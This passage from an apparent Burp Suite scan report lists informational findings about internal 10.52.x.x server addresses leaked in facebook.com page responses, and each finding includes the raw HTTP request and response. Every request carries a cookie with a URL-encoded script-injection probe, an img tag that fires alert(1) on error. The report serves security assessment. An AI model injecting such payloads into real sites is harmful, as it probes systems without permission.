Date: Thu, 05 May 2011 11:43:56 GMT
Content-Length: 0


20.221. http://www.facebook.com/pages/Barnesville/115038011847083

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Barnesville/115038011847083

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.163.47

Request

GET /pages/Barnesville/115038011847083 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.163.47
Connection: close
Date: Thu, 05 May 2011 11:41:58 GMT
Content-Length: 26916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.222. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Beacon-of-Hope-Resource-Center/34194116820

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.187.43

Request

GET /pages/Beacon-of-Hope-Resource-Center/34194116820 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.43
Connection: close
Date: Thu, 05 May 2011 11:41:45 GMT
Content-Length: 129142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.223. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Bernicks-Pepsi/123296084349478

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.103.35

Request

GET /pages/Bernicks-Pepsi/123296084349478 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.103.35
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 26965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.224. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Blaine-Senior-High/106189406087059

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.138.81

Request

GET /pages/Blaine-Senior-High/106189406087059 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.138.81
Connection: close
Date: Thu, 05 May 2011 11:42:01 GMT
Content-Length: 26986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.225. http://www.facebook.com/pages/Editor-in-Chief/137829579583400

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Editor-in-Chief/137829579583400

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.168.75

Request

GET /pages/Editor-in-Chief/137829579583400 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.75
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 26953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.226. http://www.facebook.com/pages/Gilco-Corporation/109823499042436

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Gilco-Corporation/109823499042436

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.156.75

Request

GET /pages/Gilco-Corporation/109823499042436 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.156.75
Connection: close
Date: Thu, 05 May 2011 11:41:52 GMT
Content-Length: 26978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.227. http://www.facebook.com/pages/HMFIC/149403761740008

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/HMFIC/149403761740008

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.181.83

Request

GET /pages/HMFIC/149403761740008 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.83
Connection: close
Date: Thu, 05 May 2011 11:41:49 GMT
Content-Length: 26855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.228. http://www.facebook.com/pages/HuffPost-World/70242384902

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/HuffPost-World/70242384902

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.199.43

Request

GET /pages/HuffPost-World/70242384902 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Location: http://www.facebook.com/HuffPostWorld
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.199.43
Connection: close
Date: Thu, 05 May 2011 11:42:02 GMT
Content-Length: 0


20.229. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Manchester-Connecticut/112527912096312

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.149.35

Request

GET /pages/Manchester-Connecticut/112527912096312 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.35
Connection: close
Date: Thu, 05 May 2011 11:41:58 GMT
Content-Length: 41389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.230. http://www.facebook.com/pages/Merchandiser/123981654314779

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Merchandiser/123981654314779

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.168.41

Request

GET /pages/Merchandiser/123981654314779 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.41
Connection: close
Date: Thu, 05 May 2011 11:41:45 GMT
Content-Length: 26925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.231. http://www.facebook.com/pages/New-Haven-College/130105783687523

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/New-Haven-College/130105783687523

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.198.61

Request

GET /pages/New-Haven-College/130105783687523 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.198.61
Connection: close
Date: Thu, 05 May 2011 11:42:00 GMT
Content-Length: 26979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.232. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Northern-Illinois-University/108155335871674

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.168.57

Request

GET /pages/Northern-Illinois-University/108155335871674 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.57
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 31693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.233. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/San-Antonio-Texas/110297742331680

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.153.69

Request

GET /pages/San-Antonio-Texas/110297742331680 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.69
Connection: close
Date: Thu, 05 May 2011 11:42:00 GMT
Content-Length: 39429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.234. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/School-of-Hard-Knocks-University-of-Life/115228431825707

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.163.39

Request

GET /pages/School-of-Hard-Knocks-University-of-Life/115228431825707 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.163.39
Connection: close
Date: Thu, 05 May 2011 11:41:50 GMT
Content-Length: 27236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.235. http://www.facebook.com/pages/Sporting-News/104068362964496

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Sporting-News/104068362964496

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.135.73

Request

GET /pages/Sporting-News/104068362964496 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.135.73
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 31370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.236. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/ToP-SeCNeT/195242630519520

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.134.37

Request

GET /pages/ToP-SeCNeT/195242630519520 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.134.37
Connection: close
Date: Thu, 05 May 2011 11:42:02 GMT
Content-Length: 47298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.237. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/University-of-Chicago-Semester-in-Madrid/144554762263161

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.159.71

Request

